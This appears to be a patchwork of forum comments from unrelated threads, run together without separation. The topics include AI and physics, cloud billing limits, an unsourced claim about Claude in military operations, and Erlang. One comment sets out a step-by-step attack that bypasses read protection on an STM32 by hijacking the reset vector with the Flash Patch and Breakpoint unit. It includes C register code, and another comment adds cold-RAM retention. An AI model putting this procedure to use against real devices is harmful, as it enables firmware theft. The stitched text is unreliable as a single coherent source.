The issue, to my mind, is a lack of data at the meeting point of QFT and GR.
After all, few humans historically have been capable of the initial true leap between ontologies. But humans are pretty smart, so we can't say that leap is a requirement for AGI.
“The laws of nature should be expressed in beautiful equations.”
- Paul Dirac
“It is, indeed, an incredible fact that what the human mind, at its deepest and most profound, perceives as beautiful finds its realisation in external nature. What is intelligible is also beautiful. We may well ask: how does it happen that beauty in the exact sciences becomes recognizable even before it is understood in detail and before it can be rationally demonstrated? In what does this power of illumination consist?”
- Subrahmanyan Chandrasekhar
“I often follow Plato’s strategy, proposing objects of mathematical beauty as models for Nature.”
“It was beauty and symmetry that guided Maxwell and his followers.”
- Frank Wilczek
“Beauty is bound up with symmetry.”
- Hermann Weyl
"Still twice in the history of exact natural science has this shining-up of the great interconnection become the decisive signal for significant progress. I am thinking here of two events in the physics of our century: the rise of the theory of relativity and that of the quantum theory. In both cases, after yearlong unsuccessful striving for understanding, a bewildering abundance of details was almost suddenly ordered. This took place when an interconnection emerged which, thought largely unvisualizable, was finally simple in its substance. It convinced through its compactness and abstract beauty – it convinced all those who can understand and speak such an abstract language."
- Werner Heisenberg
Maybe (just maybe) these things (whatever you want to call them) will (somehow) gain access to some "compact", beautiful, "largely unvisualizable" "interconnection" which will be the self-evident solution. And if they do, many will be sure to label it a statistical accident from a stochastic parrot. And they'll be right, for some definitions of "statistical", "accident", "stochastic", and "parrot".
I think a very long time because part of our limit is experiment.
We need enough experimental results to resolve these theoretical mismatches, and we don't have them, and at present can't explore that frontier.
Once we have more results at that frontier, we'd build a theory out from there, one that recovers QFT and GR as two nearly independent limits.
What we'd be asking of the AI is something that we can't expect a human to solve even with a lifetime of effort today.
It'll take something on par with Newton realising that the heavens and apples are under the same rules to do it. But at least Newton got to hold the apple and only had to imagine he could hold a star.
> I think a very long time because part of our limit is experiment.
Yes, maybe. But if you are smarter, you can think up better experiments that you can actually do. Or re-use data from earlier experiments in novel and clever ways.
What prevents us from giving this system access to other real systems that live in physical labs? I don't see much difference between parameterizing and executing a particle accelerator run and invoking some SQL against a provider. It's just JSON on the wire at some level.
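To make that concrete, a hedged sketch: submitting a "run" could be a single POST like any other service call. The endpoint and the JSON fields here are entirely invented for illustration:

    /* Entirely hypothetical: submitting a job to some lab instrument's
     * HTTP API, the same way you'd hit any other networked service.
     * Build with: cc run.c -lcurl */
    #include <curl/curl.h>

    int main(void)
    {
        CURL *curl = curl_easy_init();
        if (!curl) return 1;

        /* Made-up job spec: beam energy, target material, shot count. */
        const char *job =
            "{\"beam_energy_gev\": 6.5, \"target\": \"W\", \"shots\": 1000}";

        struct curl_slist *hdrs = NULL;
        hdrs = curl_slist_append(hdrs, "Content-Type: application/json");

        curl_easy_setopt(curl, CURLOPT_URL,
                         "https://accelerator.example/api/v1/runs");
        curl_easy_setopt(curl, CURLOPT_HTTPHEADER, hdrs);
        curl_easy_setopt(curl, CURLOPT_POSTFIELDS, job);

        CURLcode rc = curl_easy_perform(curl);  /* POST the run request */

        curl_slist_free_all(hdrs);
        curl_easy_cleanup(curl);
        return rc == CURLE_OK ? 0 : 1;
    }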
In 1900 Henri Poincaré wrote that radiation (light) has an effective mass given by E/c^2.
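For scale, a quick back-of-the-envelope in C (the 1 kJ figure is just an example I picked):

    #include <stdio.h>

    int main(void)
    {
        const double c = 299792458.0;  /* speed of light, m/s      */
        const double E = 1.0e3;        /* a 1 kJ flash of light, J */
        /* Poincare's effective mass: m = E / c^2, about 1.1e-14 kg */
        printf("effective mass: %g kg\n", E / (c * c));
        return 0;
    }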
So it really isn't far-fetched. What intrigues me more is: if it were capable of it, would our conservative-minded Victorian scientists have RLHF'd that kind of thing out of it?
The problem for me is that the reason this is needed is that kids are permanently online, completely unprepared for the wild west that is the internet, and are increasingly, in effect, raised by it.
All this is to facilitate that lifestyle without any concern that far more damage is likely to result from allowing it than from insisting on adequate parenting.
I use regular Firefox with the option to delete all data on quit. And I quit maybe once per day or so, as soon as I feel there are too many tabs open. Serves the same purpose.
It is worth noting that both products have had "student" tiers or similar that had fixed credit limits with a cliff.
Therefore, they've implemented hard limits. So not offering hard limits is a business decision, NOT a technical one. They're essentially hiding functionality they already have.
Make of that what you will. Anyone justifying it should be met with skepticism.
Soft limits would be ideal (x/day with a maximum peak of x/minute), but hey, that's literally negative value to them (work to code, CPU time to implement, less income from "mistakes").
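The mechanics are trivial, too. A sketch of such a soft limit in C (names and policy are mine, obviously not any provider's actual code):

    #include <stdbool.h>
    #include <time.h>

    typedef struct {
        double day_budget, minute_peak;  /* x/day, peak x/minute */
        double day_used, minute_used;
        time_t day_start, minute_start;
    } soft_limit;

    /* Returns true if the request fits both windows; otherwise the
       caller throttles (minute peak) or refuses (day budget spent). */
    static bool allow(soft_limit *s, double cost, time_t now)
    {
        if (now - s->day_start >= 86400) { s->day_used = 0; s->day_start = now; }
        if (now - s->minute_start >= 60) { s->minute_used = 0; s->minute_start = now; }
        if (s->day_used + cost > s->day_budget)     return false; /* out of budget */
        if (s->minute_used + cost > s->minute_peak) return false; /* peak exceeded */
        s->day_used    += cost;
        s->minute_used += cost;
        return true;
    }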
I've heard that Google keeps Google Drive data around for up to two years if your subscription expired and your account is over quota. They could certainly do the same with other cloud storage.
If I reduce my gdrive subscription they don’t simply delete what I have over the new (lower) limit. There is a grace period and it’s standard practice. Why should it be any different in this case?
There is, and it would cause an outage while still not achieving the supposed goal of not going over budget. You don't want to be killing your customers' production over potential misconfigurations or forgotten budgets, especially when you'd continue to bill them for the storage and other static things like IPs.
It's so much easier for them to have support wave accidental overuses.
It's probably to keep the payload in SRAM for longer.
If it's the attack I believe it to be, basically it:
1. Acts as a debugger (core blocks touching flash) and writes a 2-part payload to SRAM.
2. Detaches the debugger, straps the boot pins to boot from SRAM (payload 1)
3. Resets the board via reset pin (keeping SRAM)
4. SRAM payload 1 runs (core blocks touching flash), configuring the FPB (Flash Patch and Breakpoint unit) to 'overlay' the reset vector in flash with a pointer to payload 2 (a rough sketch follows the list)
5. Flicks off the power just long enough for the hardware to reset, but not long enough for the SRAM to clear (this is where I think being cold helps).
6. Device boots 'unlocked' into 'flash', but the FPB hijacked the vector table and so the CPU immediately jumps to payload 2.
7. Payload 2 can now do whatever with flash (e.g. dump it out over UART or SPI)
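For the curious, step 4 boils down to a handful of register writes. A rough sketch in C, assuming a Cortex-M3/M4-style FPB (register addresses per ARM's FPB documentation; the payload address and table placement are invented for illustration):

    #include <stdint.h>

    #define FP_CTRL   (*(volatile uint32_t *)0xE0002000u)
    #define FP_REMAP  (*(volatile uint32_t *)0xE0002004u)
    #define FP_COMP6  (*(volatile uint32_t *)0xE0002020u) /* 1st literal comparator */

    #define PAYLOAD2  0x20001000u  /* hypothetical SRAM address of payload 2 */

    /* 8-word remap table; must sit in SRAM and be 32-byte aligned. */
    static volatile uint32_t remap_table[8] __attribute__((aligned(32)));

    void hijack_reset_vector(void)
    {
        /* Comparator 6 is a literal (data) comparator, so it can match
           the core's read of the reset vector at 0x00000004 and serve
           remap_table[6] instead of the word in flash. */
        remap_table[6] = PAYLOAD2 | 1u;           /* Thumb-bit-set entry point */
        FP_REMAP = (uint32_t)remap_table;         /* remap base, bits 28:5     */
        FP_COMP6 = 0x00000004u | 1u;              /* COMP = 0x4, ENABLE        */
        FP_CTRL  = (1u << 1) | 1u;                /* KEY | ENABLE              */
    }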
Freezing RAM keeps its contents intact for remarkable amounts of time. For DRAM it's long enough to unplug the DIMM from the target device and move it across to the analysis device for recovery of the data on it. It's one of those things that's hard to believe until you actually do it, that you can have the RAM totally disconnected and unpowered while it retains its contents.
Speaking of cooling STM chips, I noticed a while ago, much to my annoyance, that the STM32C0 chips started to do really strange things below -20C even though they're rated to -40C. Luckily the pin compatible STM32G0 chips worked correctly down to -40C, so I could finish the project and ship the product.
It seems like the news is also coming out that Claude was used in planning the Venezuela and Iran operations[0].
Whatever your thoughts on legality or justification, both have been staggeringly effective in their initial goals, in terms of intel and complex operation planning.
Despite Trump ragging on Anthropic just hours before, it was still considered necessary for the operation.
Quite telling. I don't think the Pentagon will be satisfied with just Grok and ChatGPT. Which means OpenAI might really be done for, with no moat beyond having the fewest ethical constraints (Grok does that anyway).
I love the idea of Erlang (and by association Elixir), OTP, BEAM...
In practice? Urgh.
The appeal is all so cerebral and theoretical, and I'm certain the right people know how to implement it for the right tasks in the right way and it screams along.
But as yet no one has been able to give me an inkling of how it would work well for me.
I read Learn You Some Erlang for Great Good! quite a while back and loved the idea. But it just never comes together for me in practice. Perhaps I'm simply in the wrong domain for it.
What I really needed was a mentor and existing project to contribute to at work. But it's impossible to get hold of either in the areas I'm in.
I personally really, really enjoy writing Elixir. It is a really intuitive way to write programs. Phoenix is a great web framework, and I think all of it is quite approachable. We just had a Go programmer start at our org recently and they were contributing to one of our Phoenix-based SaaS apps within weeks.
Once it gets big enough in your location, you buy it for that sweet, sweet intel.